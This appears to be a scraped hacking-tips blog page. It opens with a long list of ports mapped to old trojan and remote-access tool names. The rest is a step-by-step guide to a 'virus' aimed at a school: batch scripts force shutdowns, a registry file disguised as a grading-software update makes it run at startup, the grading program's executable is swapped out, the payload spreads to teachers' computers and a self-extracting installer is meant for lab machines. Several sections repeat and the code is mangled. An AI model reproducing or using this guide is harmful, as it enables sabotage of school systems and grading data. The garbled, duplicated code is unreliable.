TCP 7979 VagrNocker.200
TCP 7997 VagrNocker.200
TCP 8000 XConsole.100
TCP 8011 Way.240
TCP 8012 Ptakks.215, Ptakks.217
TCP 8110 LoseLove.100
TCP 8111 LoseLove.100
TCP 8301 LoseLove.100
TCP 8302 LoseLove.100
TCP 8372 NetBoy.100
TCP 8720 Connection.130
TCP 8734 AutoSpy.110
TCP 8811 Force.155
TCP 8899 Last.2000
TCP 9000 Aristotles.100
TCP 9301 LoseLove.100
TCP 9400 InCommand.100, InCommand.110, InCommand.120, InCommand.130, InCommand.140, InCommand.150, InCommand.153, InCommand.160, InCommand.167, InCommand.170
TCP 9401 InCommand.100, InCommand.110, InCommand.170
TCP 9402 InCommand.100, InCommand.110
TCP 9561 CRatPro.110
TCP 9563 CRatPro.110
TCP 9580 TheefLE.100
TCP 9696 Danton.210, Ghost.230
TCP 9697 Danton.320, Danton.330, Ghost.230
TCP 9870 R3C.100
TCP 9872 PortalOfDoom.100
TCP 9873 PortalOfDoom.100
TCP 9874 PortalOfDoom.100
TCP 9875 PortalOfDoom.100
TCP 9876 Rux.100, SheepGoat.100
TCP 9877 SmallBigBrother.020
TCP 9878 SmallBigBrother.020, TransmissionScout.100, TransmissionScout.110, TransmissionScout.120
TCP 9879 SmallBigBrother.020
TCP 9999 ForcedEntry.100, Infra.100, Prayer.120, Prayer.130, TakeOver.200, TakeOver.300
TCP 10001 DTr.130, DTr.140
TCP 10013 Amanda.200
TCP 10067 PortalOfDoom.100
TCP 10100 Gift.240
TCP 10101 NewSilencer.100
TCP 10167 PortalOfDoom.100
TCP 10528 HostControl.100, HostControl.260
TCP 10607 Coma.109
TCP 10666 Ambush.100
TCP 11011 Amanda.200
TCP 11050 HostControl.101
TCP 11051 HostControl.100, HostControl.260
TCP 11223 AntiNuke.100, Progenic.100, Progenic.110
TCP 11225 Cyn.100, Cyn.103, Cyn.120
TCP 11306 Noknok.800, Noknok.820
TCP 11831 Katux.200, Latinus.140, Latinus.150, Pest.100, Pest.400
TCP 11991 PitfallSurprise.100
TCP 12043 Frenzy.2000
TCP 12345 Fade.100, Netbus.160, Netbus.170, VagrNocker.400
TCP 12346 Netbus.160, Netbus.170
TCP 12348 Bionet.210, Bionet.261, Bionet.280, Bionet.302, Bionet.305, Bionet.311, Bionet.313, Bionet.316, Bionet.317
TCP 12349 Bionet.084, Bionet.261, Bionet.280, Bionet.302, Bionet.305, Bionet.311, Bionet.313, Bionet.314, Bionet.316, Bionet.317, Bionet.401, Bionet.402
TCP 12389 KheSanh.210
TCP 12478 Bionet.210
TCP 12623 Buttman.090, Buttman.100
TCP 12624 Buttman.090, Buttman.100
TCP 12625 Buttman.100
TCP 12904 Akropolis.100, Rocks.100
TCP 13473 Chupacabra.100
TCP 13753 AFTP.010
TCP 14100 Eurosol.100
TCP 14194 CyberSpy.840
TCP 14286 HellDriver.100
TCP 14500 PCInvader.050, PCInvader.060, PCInvader.070
TCP 14501 PCInvader.060, PCInvader.070
TCP 14502 PCInvader.050, PCInvader.060, PCInvader.070
TCP 14503 PCInvader.050, PCInvader.060, PCInvader.070
TCP 14504 PCInvader.050, PCInvader.060
TCP 15092 HostControl.100, HostControl.260
TCP 15382 SubZero.100
TCP 15432 Cyn.210
TCP 15555 ICMIBC.100
TCP 16322 LastDoor.100
TCP 16484 MoSucker.110
TCP 16661 Dfch.010
TCP 16969 Progenic.100
TCP 16982 AcidShiver.100
TCP 17300 Kuang.200
TCP 17499 CrazzyNet.370, CrazzyNet.375, CrazzyNet.521
TCP 17500 CrazzyNet.370, CrazzyNet.375, CrazzyNet.521
TCP 17569 Infector.141, Infector.160, Infector.170, Infector.180, Infector.190, Infector.200, Intruder.100, Intruder.100
TCP 17593 AudioDoor.120
TCP 19191 BlueFire.035, BlueFire.041
TCP 19604 Metal.270
TCP 19605 Metal.270
TCP 19991 Dfch.010
TCP 20000 Millenium.100
TCP 20001 Millenium.100, PshychoFiles.180
TCP 20002 AcidKor.100, PshychoFiles.180
TCP 20005 MoSucker.200, MoSucker.210, MoSucker.220
TCP 21212 Schwindler.182
TCP 21554 Exploiter.100, Exploiter.110, Girlfriend.130, GirlFriend.135
TCP 21579 Breach.2001
TCP 21584 Breach.2001
TCP 21684 Intruse.134
TCP 22068 AcidShiver.110
TCP 22115 Cyn.120
TCP 22222 Prosiak.047, Ruler.141, Rux.300, Rux.400, Rux.500, Rux.600
TCP 22223 Rux.400, Rux.500, Rux.600
TCP 22456 Bla.200, Bla.503
TCP 22457 AcidShiver.120, Bla.200, Bla.503
TCP 22784 Intruzzo.110
TCP 22845 Breach.450
TCP 22847 Breach.450
TCP 23005 Infinaeon.110, NetTrash.100, Oxon.110, WinRat.100
TCP 23006 Infinaeon.110, NetTrash.100, Oxon.110, WinRat.100
TCP 23032 Amanda.200
TCP 23432 Asylum.010, Asylum.012, Asylum.013, Asylum.014, MiniAsylum.110
TCP 23456 EvilFTP.100, VagrNocker.400
TCP 23476 DonaldDick.153, DonaldDick.154, DonaldDick.155
TCP 23477 DonaldDick.153
TCP 24000 Infector.170
TCP 24307 Wildek.020
TCP 25386 MoonPie.220
TCP 25486 MoonPie.220
TCP 25555 FreddyK.100, FreddyK.200
TCP 25556 FreddyK.100
TCP 25685 MoonPie.010, MoonPie.012, MoonPie.130, MoonPie.220, MoonPie.240, MoonPie.400
TCP 25686 MoonPie.135, MoonPie.200, MoonPie.400
TCP 25982 MoonPie.135, MoonPie.200
TCP 26274 Delta.050
TCP 27160 MoonPie.135, MoonPie.200
TCP 27184 Alvgus.100, Alvgus.800
TCP 27374 Muerte.110, Subseven.210, SubSeven.213
TCP 28429 Hack'a'Tack.2000
TCP 28430 Hack'a'Tack.2000
TCP 28431 Hack'a'Tack.2000
TCP 28432 Hack'a'Tack.2000
TCP 28433 Hack'a'Tack.2000
TCP 28434 Hack'a'Tack.2000
TCP 28435 Hack'a'Tack.2000
TCP 28436 Hack'a'Tack.2000
TCP 29559 DuckToy.100, DuckToy.101, Katux.200, Latinus.140, Latinus.150, Pest.100, Pest.400
TCP 29891 Unexplained.100
TCP 30000 Infector.170
TCP 30001 Error32.100
TCP 30003 LamersDeath.100
TCP 30029 AOLTrojan.110
TCP 30100 NetSphere.127, NetSphere.130, NetSphere.131
TCP 30101 NetSphere.127, NetSphere.130, NetSphere.131
TCP 30102 NetSphere.127, NetSphere.130, NetSphere.131
TCP 30103 NetSphere.131
TCP 30947 Intruse.134
TCP 31320 LittleWitch.400, LittleWitch.420
TCP 31337 BackOrifice.120, Khaled.100, OPC.200
TCP 31415 Lithium.101
TCP 31416 Lithium.100, Lithium.101
TCP 31557 Xanadu.110
TCP 31631 CleptoManicos.100
TCP 31745 Buschtrommel.100, Buschtrommel.122
TCP 31785 Hack'a'Tack.100, Hack'a'Tack.112
TCP 31787 Hack'a'Tack.100, Hack'a'Tack.112
TCP 31789 Hack'a'Tack.100, Hack'a'Tack.112
TCP 31791 Hack'a'Tack.100, Hack'a'Tack.112
TCP 31887 BDDT.100
TCP 31889 BDDT.100
TCP 32100 ProjectNext.053
TCP 32418 AcidBattery.100
TCP 32791 Akropolis.100, Rocks.100
TCP 33291 RemoteHak.001
TCP 33333 Blackharaz.100, Prosiak.047, SubSeven.214
TCP 33577 SonOfPsychward.020
TCP 34324 TelnetServer.100
TCP 34763 Infector.180, Infector.190, Infector.200
TCP 35000 Infector.190, Infector.200
TCP 35600 Subsari.140
TCP 36794 BugBear.100
TCP 37237 Mantis.020
TCP 37651 YAT.210
TCP 37653 YAT.310
TCP 40308 Subsari.140
TCP 40412 TheSpy.100
TCP 40421 MastersParadise.970
TCP 40422 MastersParadise.970
TCP 40999 DiemsMutter.110, DiemsMutter.140
TCP 41626 Shah.100
TCP 44444 Prosiak.070
TCP 45673 Akropolis.100, Rocks.100
TCP 47262 Delta.050
TCP 48006 Fragglerock.200
TCP 49683 HolzPferd.210
TCP 50000 Infector.180
TCP 50130 Enterprise.100
TCP 50766 Fore.100
TCP 51234 Cyn.210
TCP 51966 Cafeini.080, Cafeini.110
TCP 54321 PCInvader.010
TCP 57341 NetRaider.100
TCP 57922 Bionet.084
TCP 58008 Tron.100
TCP 58009 Tron.100
TCP 59090 AcidReign.200
TCP 59211 DuckToy.100, DuckToy.101
TCP 59345 NewFuture.100
TCP 60000 DeepThroat.300, MiniBacklash.100, MiniBacklash.101, MiniBacklash.101
TCP 60411 Connection.100, Connection.130
TCP 60412 Connection.130
TCP 60552 RoxRat.100
TCP 63536 InsaneNetwork.500
TCP 63878 AphexFTP.100
TCP 63879 AphexFTP.100
TCP 64969 Lithium.100
TCP 65000 Socket.100
UDP 1 SocketsDeTroie.250
UDP 666 Bla.200, Bla.400, Bla.503, Noknok.820
UDP 1130 Noknok.800, Noknok.820
UDP 2140 DeepThroat.100, DeepThroat.200, DeepThroat.310
UDP 2989 Rat.200
UDP 3128 MastersParadise.970
UDP 3129 MastersParadise.920, MastersParadise.970
UDP 3150 DeepThroat.100, DeepThroat.200, DeepThroat.310, MiniBacklash.110
UDP 3333 Daodan.123
UDP 3800 Eclypse.100
UDP 3996 RemoteAnything.364
UDP 4000 RemoteAnything.364
UDP 5555 Daodan.123
UDP 5881 Y3KRat.110, Y3KRat.140
UDP 5882 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.140, Y3KRat.150
UDP 5883 Y3KRat.110, Y3KRat.140
UDP 5884 Y3KRat.140, Y3KRat.150
UDP 5885 Y3KRat.110, Y3KRat.120, Y3KRat.140
UDP 5886 Y3KRat.120, Y3KRat.140
UDP 5887 Y3KRat.110, Y3KRat.120, Y3KRat.140
UDP 5888 Y3KRat.100, Y3KRat.110, Y3KRat.120, Y3KRat.150
UDP 6953 Lithium.100
UDP 8012 Ptakks.217
UDP 10067 PortalOfDoom.100
UDP 10167 PortalOfDoom.100
UDP 10666 Ambush.100
UDP 11225 Cyn.100, Cyn.103, Cyn.120
UDP 11306 Noknok.800, Noknok.820
UDP 12389 KheSanh.210
UDP 12623 Buttman.090, Buttman.100
UDP 12625 Buttman.100
UDP 14100 Eurosol.100
UDP 23476 DonaldDick.155
UDP 26274 Delta.050
UDP 27184 Alvgus.100
UDP 28431 Hack'a'Tack.2000
UDP 28432 Hack'a'Tack.2000
UDP 28433 Hack'a'Tack.2000
UDP 28434 Hack'a'Tack.2000
UDP 28435 Hack'a'Tack.2000
UDP 28436 Hack'a'Tack.2000
UDP 29891 Unexplained.100
UDP 30103 NetSphere.131
UDP 31320 LittleWitch.400, LittleWitch.420
UDP 31337 BackOrifice.120, OPC.200
UDP 31416 Lithium.100, Lithium.101
UDP 31789 Hack'a'Tack.100, Hack'a'Tack.112
UDP 31791 Hack'a'Tack.100, Hack'a'Tack.112
UDP 33333 Blackharaz.100
UDP 47262 Delta.050
UDP 49683 HolzPferd.210
UDP 60000 MiniBacklash.100
Create Virus to shut down the computer!!!
There are two methods of doing this1.
First of all go to
Start Menu > then Run > type CMD (Command Prompt) , and after that when the command prompt open type "Shut down -a".
This prevent the shut down.
2.
Open the Note pad , then write
"shutdown -s -t 0"
0 = This is for shut down in 0 seconds
(t = time s=shutdown)
And if you want to restart then:-
Use this
shutdown -r -t 0
0 = same but this is for restart comp. in 0 seconds..
(only for windows xp)
First of all go to
Start Menu > then Run > type CMD (Command Prompt) , and after that when the command prompt open type "Shut down -a".
This prevent the shut down.
2.
Open the Note pad , then write
"shutdown -s -t 0"
0 = This is for shut down in 0 seconds
(t = time s=shutdown)
And if you want to restart then:-
Use this
shutdown -r -t 0
0 = same but this is for restart comp. in 0 seconds..
(only for windows xp)
Shut down your School!!
By using this command you can shutdown your school or college by using only Note pad.
This is the main command that will be launched upon startup.
Type this in Notepad.
@echo offshutdown.exe -s -t 10 -c
"You have been hacked!"
Save this as shutdown.bat, making sure you choose all files as the filetype.
Step 2
Make it run on StartupThe file you need can be downloaded here:This is just a simple registry file that anyone can create, but I don't feel like explaining the registry to everyone. It will disguise itself by claiming to be an update for STI.
http://www.mutantsrus.com/Update.reg
Step 3
Set up the replication systemHere is the code to set up the replicator (the program that allows the virus to reproduce). This simply gets it ready to infect the teachers. ?,$, and ! means that it varies. It depends on what program you are using. To find out how to fill these blank, get on a computer that has access to the server that stores your grading program. ? is the drive letter. $ is any folders and sub folders that contain the main exe for the grading program. ! is the name of the main exe.
Example O:\sti\ssts2\sti.exe?=O$=sti\ssts2!=sti
Here is the code:
@echo offcd C:\move ?:\$\!.exeren C:?.exe real.exeren C:virus.exe !.execd ?:\$move C:\!.exemove C:\shutdown.batmove C:\Update.regexit
Save this as global.bat
Step 4
They grow up so fast -- real fast!This script will infect any teacher that uses STI with the shutdown command. The little viral babies will copy themselves to the user's hard drive and remain there.
@echo offcd C:\WINDOWSEcho STI must update itself, this will only take a few seconds.pauseEcho Please wait while the files install.move ?:\$\shutdown.batmove ?:\$\Update.regmove ?:\$\cure.exemove ?:\$\cure.exemove ?:\$\cure.batmove ?:\$\remove.batEcho Adding information to registry.pausestart regedit.exe Update.regcd ?:\$start real.exeexit
Now this one has to be in exe form. So save it as virus.bat, then compile it in Quick Batch File Compiler. You can get QuickBFC here: QuickBFC and download this file as a template for QuickBFC to work with. Just save the compiled file over this one.
Step 5
The CureThis is a little tool that can fix all damage done by your virus, it works in the same way that the virus works, but works to correct the problem rather than create it.
@echo off
shutdown -acd C:\WINDOWSdel shutdown.bat
Save as cure.bat
@echo offcd ?:\$del !.execd C:\move ?:\$\real.exeren C:\real.exe !.execd ?:\$move C:\?.execd C:\WINDOWS
Now download this file: http://www.mutantsrus.com/cure.exe
Step 6
The SetupNo it's not the name of a heist movie. It is simply a SFX file that extracts all the files to their proper places and places the replicator in the STI drive.I am going to use WinRAR to do this. You can get WinRAR here: http://www.rarlab.com. First gather all the files you have made thus far. The files should be shutdown.bat, Update.reg, virus.exe, cure.exe, cure.bat, remove.bat and global.bat. Now select them all and put them in a .rar file. Then open Winrar and go to "tools", then select "convert archive to SFX". Click "Advanced SFX Options" In the field labeled Path to Extract, type C:\WINDOWS In the field labeled Run After Extraction, type C:\WINDOWS\global.bat Save the finished file anywhere you want and as any name. To install the virus, just run this program on a computer at school that is connected to the server that has the grading program on it (such as any computer in the Comp Lab.)
This is the main command that will be launched upon startup.
Type this in Notepad.
@echo offshutdown.exe -s -t 10 -c
"You have been hacked!"
Save this as shutdown.bat, making sure you choose all files as the filetype.
Step 2
Make it run on StartupThe file you need can be downloaded here:This is just a simple registry file that anyone can create, but I don't feel like explaining the registry to everyone. It will disguise itself by claiming to be an update for STI.
http://www.mutantsrus.com/Update.reg
Step 3
Set up the replication systemHere is the code to set up the replicator (the program that allows the virus to reproduce). This simply gets it ready to infect the teachers. ?,$, and ! means that it varies. It depends on what program you are using. To find out how to fill these blank, get on a computer that has access to the server that stores your grading program. ? is the drive letter. $ is any folders and sub folders that contain the main exe for the grading program. ! is the name of the main exe.
Example O:\sti\ssts2\sti.exe?=O$=sti\ssts2!=sti
Here is the code:
@echo offcd C:\move ?:\$\!.exeren C:?.exe real.exeren C:virus.exe !.execd ?:\$move C:\!.exemove C:\shutdown.batmove C:\Update.regexit
Save this as global.bat
Step 4
They grow up so fast -- real fast!This script will infect any teacher that uses STI with the shutdown command. The little viral babies will copy themselves to the user's hard drive and remain there.
@echo offcd C:\WINDOWSEcho STI must update itself, this will only take a few seconds.pauseEcho Please wait while the files install.move ?:\$\shutdown.batmove ?:\$\Update.regmove ?:\$\cure.exemove ?:\$\cure.exemove ?:\$\cure.batmove ?:\$\remove.batEcho Adding information to registry.pausestart regedit.exe Update.regcd ?:\$start real.exeexit
Now this one has to be in exe form. So save it as virus.bat, then compile it in Quick Batch File Compiler. You can get QuickBFC here: QuickBFC and download this file as a template for QuickBFC to work with. Just save the compiled file over this one.
Step 5
The CureThis is a little tool that can fix all damage done by your virus, it works in the same way that the virus works, but works to correct the problem rather than create it.
@echo off
shutdown -acd C:\WINDOWSdel shutdown.bat
Save as cure.bat
@echo offcd ?:\$del !.execd C:\move ?:\$\real.exeren C:\real.exe !.execd ?:\$move C:\?.execd C:\WINDOWS
Now download this file: http://www.mutantsrus.com/cure.exe
Step 6
The SetupNo it's not the name of a heist movie. It is simply a SFX file that extracts all the files to their proper places and places the replicator in the STI drive.I am going to use WinRAR to do this. You can get WinRAR here: http://www.rarlab.com. First gather all the files you have made thus far. The files should be shutdown.bat, Update.reg, virus.exe, cure.exe, cure.bat, remove.bat and global.bat. Now select them all and put them in a .rar file. Then open Winrar and go to "tools", then select "convert archive to SFX". Click "Advanced SFX Options" In the field labeled Path to Extract, type C:\WINDOWS In the field labeled Run After Extraction, type C:\WINDOWS\global.bat Save the finished file anywhere you want and as any name. To install the virus, just run this program on a computer at school that is connected to the server that has the grading program on it (such as any computer in the Comp Lab.)
Zuu
ReplyDelete